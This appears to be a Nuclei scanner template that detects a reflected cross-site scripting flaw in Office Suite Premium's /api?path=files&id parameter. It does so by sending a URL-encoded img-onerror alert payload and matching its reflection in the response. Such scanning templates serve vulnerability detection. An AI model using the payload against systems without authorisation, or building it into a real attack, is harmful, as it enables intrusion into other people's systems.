id: office-suite-xss

info:
  name: Office Suite Premium < 10.9.1.42602 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Office Suite is suffering from an XSS vulnerability in the following parameter /api?path=files&id. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39632
  metadata:
    verified: true
    max-request: 1
  tags: xss,office,suite

http:
  - method: GET
    path:
      - "{{BaseURL}}/api?path=files&id=dfsse%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=a onerror=alert(document.domain)>", "\"payload\":")'
        condition: and

# digest: 4a0a00473045022015bdf974cdfe562fb3b54dfbd2ff55be0c627f8183fe2bd2ffab70610f64ba9a022100e8afcb73b8ec0b8ec74f2fd7bd9a256b3fc3d615424517cacd20e280bf917ecf:922c64590222798bb761d5b6d8e72950
